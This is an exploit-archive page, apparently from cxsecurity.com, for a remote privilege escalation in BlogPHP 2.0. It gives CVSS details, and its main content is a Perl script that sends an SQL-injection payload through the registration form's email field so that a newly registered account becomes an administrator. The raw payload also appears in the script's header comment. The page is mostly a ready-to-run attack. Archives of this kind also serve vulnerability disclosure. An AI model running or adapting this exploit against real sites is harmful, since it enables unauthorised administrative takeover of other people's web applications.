BlogPHP 2.0 Remote Privilege Escalation Exploit

2009-04-23 / 2009-04-24
Credit: Cod3rZ
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # BlogPHP 2.0 Remote Privilege Escalation Exploit # Author : Cod3rZ # Site : http://cod3rz.helloweb.eu # Site : http://devilsnight.altervista.org # Cuz We Back Rude This Time # # Privilege Escalation # Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with: # username=[yourusername]&password=[yourpass]&email=[yourmail]','Admin','','','','','','','','','','','','')/* # # There are other bugs, find them yourself # # Usage: perl bp.pl <site> <user> <pass> <mail> system('cls'); #system('clear'); use LWP::UserAgent; use HTTP::Request::Common; $site = $ARGV[0]; $user = $ARGV[1]; $pass = $ARGV[2]; $mail = $ARGV[3]; print " -------------------------------------------------\n"; print " BlogPHP 2.0 Remote Privilege Escalation Exploit \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; sub usage { print " Usage: perl bp.pl <site> <user> <pass> <mail> \n"; print " -------------------------------------------------\n"; } if(!$mail) { &usage; } else { if ($site !~ /http:\/\//) { $site = "http://".$site; } print " Site: $site \n"; print " User: $user \n"; print " Pass: $pass \n"; print " Mail: $mail \n"; print " -------------------------------------------------\n"; print " Please Wait \n"; print " -------------------------------------------------\n"; $ua = LWP::UserAgent->new; $lwp = $ua->request(POST $site.'index.php?act=register2', [ username => $user, password => $pass, email => $mail."','Admin','','','','','','','','','','','','')/*" ]); if($lwp->content =~ /Your now registered and logged in/) { print " Done. Now you're admin \n"; print " -------------------------------------------------\n"; } else { print " Failed. \n"; print " -------------------------------------------------\n"; } }

References:

http://www.milw0rm.com/exploits/5909


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top